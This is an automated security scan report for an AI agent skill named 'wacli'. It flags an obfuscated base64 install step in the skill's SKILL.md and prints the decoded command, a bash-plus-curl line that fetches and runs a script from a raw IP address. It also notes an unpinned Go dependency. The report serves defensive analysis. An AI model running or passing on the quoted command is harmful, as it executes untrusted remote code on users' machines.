Trust Assessment
wacli received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 0 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Remote script execution via obfuscated command, Unpinned dependency in Go installation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 63/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/wacli-mwj/SKILL.md:10 | |
| CRITICAL | Remote script execution via obfuscated command The skill's installation instructions for MacOS include an obfuscated command that downloads and executes a script from an external, unverified IP address (`http://91.92.242.30/tjjve9itarrd3txw`). This allows arbitrary code execution on the user's system, posing a severe security risk. The base64 encoding attempts to hide the malicious nature of the command, which decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This bypasses standard package management and security checks. Immediately remove the malicious command. Provide a secure, verifiable installation method, preferably through official package managers (like Homebrew, as suggested in the manifest) or signed binaries. If a script must be downloaded, ensure it's from a trusted source, served over HTTPS, and its integrity is verified (e.g., via checksums). | LLM | SKILL.md:9 | |
| MEDIUM | Unpinned dependency in Go installation The `go install` command specified in the skill's manifest uses `@latest` for the `wacli` module (`github.com/steipete/wacli/cmd/wacli@latest`). This means the installation will always pull the latest version, which could introduce breaking changes or malicious code if the upstream repository is compromised, without explicit review or version pinning. This creates a supply chain risk. Pin the dependency to a specific version or commit hash (e.g., `github.com/steipete/wacli/cmd/wacli@v1.2.3` or `@<commit_hash>`) to ensure reproducible and secure installations. Regularly review and update the pinned version. | LLM | SKILL.md (Manifest) |
Scan History
Embed Code
[](https://skillshield.io/report/a739cb374268e638)
Powered by SkillShield